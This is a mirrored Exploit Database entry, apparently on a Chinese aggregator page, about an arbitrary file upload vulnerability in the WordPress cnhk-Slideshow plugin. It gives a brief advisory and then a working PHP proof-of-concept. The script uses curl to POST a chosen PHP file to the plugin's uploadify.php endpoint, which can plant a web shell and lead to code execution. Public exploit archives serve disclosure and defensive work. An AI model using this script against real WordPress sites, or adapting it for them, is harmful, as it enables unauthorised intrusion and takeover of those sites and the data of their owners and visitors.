WordPress Plugin cnhk-Slideshow – Arbitrary File Upload

• Exploit Database
• 146 阅读

• 作者： Ashiyane Digital Security Team
  日期： 2014-05-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39190/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  source: https://www.securityfocus.com/bid/67469/info   The cnhk-slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.   An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.   <?php $uploadfile="file.php"; $ch = curl_init(" http://localhost/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(&apos;slideshow&apos;=>"@$uploadfile")); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?>